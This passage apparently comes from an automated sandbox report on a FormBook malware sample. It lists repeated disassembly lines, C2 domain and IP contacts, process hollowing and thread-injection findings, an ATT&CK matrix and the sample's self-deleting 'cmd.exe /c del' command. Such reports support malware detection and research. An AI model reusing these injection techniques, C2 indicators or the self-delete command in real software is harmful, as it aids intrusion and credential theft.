          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04957D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04973D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04978EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04968E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04948794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04950050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04950050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04953A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04948A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.th0rgramm.com
          Source: C:\Windows\explorer.exeDomain query: www.mywinnersworld.com
          Source: C:\Windows\explorer.exeDomain query: www.hatikuturkila.com
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 91.236.136.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.rainbowsdepot.com
          Source: C:\Windows\explorer.exeDomain query: www.tonton-koubou.com
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.185.226 80
          Source: C:\Windows\explorer.exeDomain query: www.gracieleesgiftsandmore.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.97.19.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ezmodafinil.com
          Source: C:\Windows\SysWOW64\explorer.exeDomain query: www.formula-kuhni.com
          Source: C:\Windows\explorer.exeDomain query: www.phillhutt.com
          Source: C:\Windows\explorer.exeDomain query: www.orgoneartist.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.205.188.68 80
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_740D1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Users\user\Desktop\AQJEKNHnWK.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 8C0000
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: explorer.exe, 00000004.00000000.217135660.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp, explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery241Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383851 Sample: AQJEKNHnWK.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 32 www.thelitigatorsbookclub.com 2->32 34 www.jjwheelerphotography.com 2->34 36 4 other IPs or domains 2->36 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 4 other signatures 2->52 11 AQJEKNHnWK.exe 18 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\bdww7k1w8bk0.dll, PE32 11->30 dropped 64 Detected unpacking (changes PE section rights) 11->64 66 Maps a DLL or memory area into another process 11->66 68 Tries to detect virtualization through RDTSC time measurements 11->68 70 Contains functionality to prevent local Windows debugging 11->70 15 AQJEKNHnWK.exe 11->15         started        signatures6 process7 signatures8 72 Modifies the context of a thread in another process (thread injection) 15->72 74 Maps a DLL or memory area into another process 15->74 76 Sample uses process hollowing technique 15->76 78 Queues an APC in another process (thread injection) 15->78 18 explorer.exe 15->18 injected process9 dnsIp10 38 www.formula-kuhni.com 91.236.136.12, 80 